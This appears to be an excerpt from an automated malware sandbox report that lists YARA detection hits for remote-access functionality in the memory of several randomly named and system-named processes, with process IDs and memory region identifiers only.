Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ShellExperienceHost.exe PID: 7484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ShellExperienceHost.exe PID: 7560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 7640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 8152, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000001E.00000002.2180403115.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2187145311.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2234188359.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2187145311.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2159383737.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2187202631.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2180403115.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2172899315.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2155021661.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2159383737.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2177147830.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2186040475.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2179948488.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2187202631.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2119361653.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2256735845.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074993070.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2185482678.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4KjLUaW30K.exe PID: 4564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: audiodg.exe PID: 1488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: audiodg.exe PID: 6768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ShellExperienceHost.exe PID: 7484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ShellExperienceHost.exe PID: 7560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 7640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 8152, type: MEMORYSTR